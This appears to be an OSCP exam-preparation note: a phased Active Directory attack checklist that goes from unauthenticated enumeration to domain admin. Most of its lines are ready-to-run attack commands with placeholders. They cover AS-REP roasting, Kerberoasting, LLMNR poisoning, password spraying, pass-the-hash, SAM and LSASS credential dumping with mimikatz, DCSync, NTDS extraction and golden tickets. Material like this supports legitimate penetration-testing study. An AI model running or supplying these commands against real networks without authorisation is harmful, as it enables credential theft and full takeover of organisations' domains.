// notes/ Active Directory
🏛️

AD Attack Checklist

The full Active Directory attack checklist — enum, creds, movement, DA.

#active directory#checklist
source · airouboss/oscp-prep-notes-2026 · active-directory/ad-attack-checklist.md

AD Attack Checklist

Phase 0: No Credentials

  • Null session: nxc smb DC-IP -u '' -p ''
  • Guest session: nxc smb DC-IP -u 'guest' -p ''
  • LDAP anonymous: ldapsearch -x -H ldap://DC-IP -b "DC=domain,DC=com"
  • Kerbrute user enum: kerbrute userenum --dc DC-IP -d DOMAIN userlist.txt
  • AS-REP roast found users: impacket-GetNPUsers 'DOMAIN/' -dc-ip DC-IP -usersfile users.txt -no-pass
  • Check for LLMNR/NBT-NS poisoning: responder -I eth0
  • Check for relay opportunities: nxc smb TARGETS --gen-relay-list relay.txt

Phase 1: Got Creds (Low-Priv Domain User)

  • Validate creds: nxc smb DC-IP -u USER -p PASS
  • BloodHound collection: bloodhound-ce-python -u USER -p PASS -ns DC-IP -d DOMAIN -c All --zip
  • Mark user owned in BloodHound → find paths
  • Enumerate shares: nxc smb DC-IP -u USER -p PASS --shares
  • Spider shares for creds: nxc smb DC-IP -u USER -p PASS -M spider_plus
  • Kerberoast: impacket-GetUserSPNs 'DOMAIN/USER:PASS' -dc-ip DC-IP -request
  • AS-REP roast all users: impacket-GetNPUsers 'DOMAIN/USER:PASS' -dc-ip DC-IP -request
  • Check LAPS: nxc ldap DC-IP -u USER -p PASS --laps
  • Check gMSA: nxc ldap DC-IP -u USER -p PASS --gmsa
  • Enum ADCS: certipy find -u USER@DOMAIN -p PASS -dc-ip DC-IP -vulnerable
  • Check MSSQL: nxc mssql TARGETS -u USER -p PASS
  • Password spray: nxc smb DC-IP -u users.txt -p 'CommonPass1' --continue-on-success
  • Check for delegation: BloodHound → "Shortest Path to Unconstrained Delegation"

Phase 2: Got Creds (Multiple Users / Service Accounts)

  • Check each user's permissions in BloodHound
  • GenericAll/GenericWrite → targeted kerberoast, password change, RBCD
  • ForceChangePassword → change target's password
  • WriteDACL → grant yourself DCSync
  • AddMember → add yourself to privileged groups
  • MSSQL impersonation → xp_cmdshell
  • WinRM access: nxc winrm TARGETS -u USER -p PASS
  • RDP access: nxc rdp TARGETS -u USER -p PASS
  • PSExec/WMIExec with admin creds: impacket-psexec 'DOMAIN/USER:PASS'@TARGET
  • Pass-the-Hash: nxc smb TARGETS -u USER -H NTHASH

Phase 3: Got Local Admin on a Host

  • Dump SAM: reg save hklm\sam sam && reg save hklm\system system
  • Mimikatz logonpasswords: sekurlsa::logonpasswords
  • LSASS dump: comsvcs.dllpypykatz
  • Check for cached domain creds
  • Check for other users' sessions (token impersonation)
  • Loot: browser creds, KeePass, config files, PowerShell history
  • Pivot to other hosts with found creds

Phase 4: Domain Admin Path

  • DCSync: impacket-secretsdump 'DOMAIN/USER:PASS'@DC-IP
  • Dump NTDS.dit for all domain hashes
  • Golden ticket with krbtgt hash
  • Access all machines with DA hash
  • Get proof: type C:\Users\Administrator\Desktop\proof.txt

Common AD Misconfigs to Always Check

  • Users with SPNs (Kerberoastable)
  • Users with "Do not require Kerberos preauthentication" (AS-REP)
  • Unconstrained delegation machines
  • ADCS misconfigured templates (ESC1-ESC8)
  • GPO abuse paths
  • Nested group memberships giving unexpected privs